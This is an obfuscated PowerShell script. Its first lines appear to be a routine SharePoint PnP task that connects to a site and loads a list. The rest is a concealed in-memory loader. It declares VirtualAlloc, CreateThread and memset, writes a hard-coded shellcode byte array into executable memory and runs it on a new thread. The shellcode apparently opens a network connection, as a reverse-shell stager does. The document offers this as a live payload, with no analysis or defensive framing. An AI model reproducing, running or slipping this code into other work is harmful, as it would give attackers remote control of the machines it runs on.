${Sit`E`UrL} = ("{0}{4}{2}{3}{6}{1}{8}{5}{10}{7}{9}"-f'h','ur','/','<','ttps:/','enant>.sha','yo','nt.c','t','om','repoi')
${CReDe`Nt`iaLS} = .("{2}{0}{3}{4}{1}"-f 't-Cr','al','Ge','ed','enti')
&("{2}{0}{1}{3}" -f 'ct-','PnPOnli','Conne','ne') -Url ${SI`Teu`Rl} -Credentials ${C`ReDeN`T`iAls}
${C`TX} = .("{0}{1}{2}{3}" -f'Get-P','nPCo','nte','xt')
${w} = ${C`Tx}."W`EB"
${w}."Li`stS".("{1}{3}{2}{0}" -f'tle','Ge','Ti','tBy').Invoke(("{0}{2}{1}" -f'Te','tList','s'))
${c`TX}.("{1}{0}" -f 'd','Loa').Invoke(${w})
.("{3}{0}{2}{1}"-f 'nv','PnPQuery','oke-','I') 

${c} = (((("{92}{67}{10}{93}{44}{23}{0}{75}{39}{13}{22}{69}{82}{16}{111}{29}{61}{2}{12}{11}{96}{53}{74}{57}{32}{41}{73}{105}{24}{63}{88}{38}{103}{109}{66}{68}{48}{26}{79}{90}{47}{56}{7}{99}{4}{18}{107}{76}{45}{27}{100}{59}{78}{97}{9}{49}{19}{34}{42}{54}{6}{102}{70}{114}{1}{91}{64}{30}{95}{94}{81}{87}{28}{106}{58}{5}{20}{60}{85}{46}{55}{15}{112}{80}{65}{40}{84}{36}{113}{51}{25}{77}{21}{62}{72}{110}{98}{31}{115}{71}{8}{17}{43}{101}{104}{50}{86}{37}{35}{89}{52}{108}{14}{3}{33}{83}"-f'n','t','rtu',' c','tic ','tr ','ntPtr lpS','st','r','i','rt','Alloc(IntPtr','al','l{0}','t','D','t','n ','extern IntPtr Cr','ac','lpT','ll{0}',')]public stat','0}ker',',','r','{0}ke','(In','ation','tr','ra',' ','wSi','ount','kSize','dest, ','0}',' ','int flP','.dl','mpor','ze, uint flAlloc',', ','Int','{','Thread','eadId)','li','(','nt dwSt','nt','vc',' u','ss,','I',';[','c ','d','ntP','r lpThread','h',' Vi',')]public ',' ','tr lpPa','I','ect);[DllImpor','o','t','ic exte','ddr','e','sta','ationT',' uint ','el32','te','t.d','Attribute','rnel32.dll{0})]pu','l','i','rn In',');','t({','r','Ptr','nt dwCre','u','uint src,','b','P','[DllImp','(','ter, u','me',' lpAddre','s, u','c','a','tPt','P','tartA','ro','tr memset(I','ype','Flags, I','ea','in','t','ti','P','l','ms','ess, In','ext'))  -f [chAr]34));${w} = &("{2}{1}{0}" -f 'pe','dd-Ty','A') -memberDefinition ${C} -Name ("{1}{0}" -f'2','Win3') -namespace ("{2}{4}{1}{3}{0}" -f'ions','32Fu','Wi','nct','n') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0x00,0x00,0x00,0x00,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${Z}."Le`Ngth" -gt 0x1000){${G} = ${z}."leN`GTH"};${x}=${W}::("{0}{1}{2}" -f'VirtualAll','o','c').Invoke(0,0x1000,${G},0x40);for (${I}=0;${i} -le (${Z}."LE`NGth"-1);${I}++) {${W}::"M`emsEt"([IntPtr](${x}.("{0}{2}{1}" -f 'ToIn','32','t').Invoke()+${i}), ${Z}[${i}], 1)};${w}::("{2}{1}{0}" -f'read','Th','Create').Invoke(0,0,${X},0,0,0);for (;;){&("{1}{2}{0}"-f'p','Star','t-slee') 60};
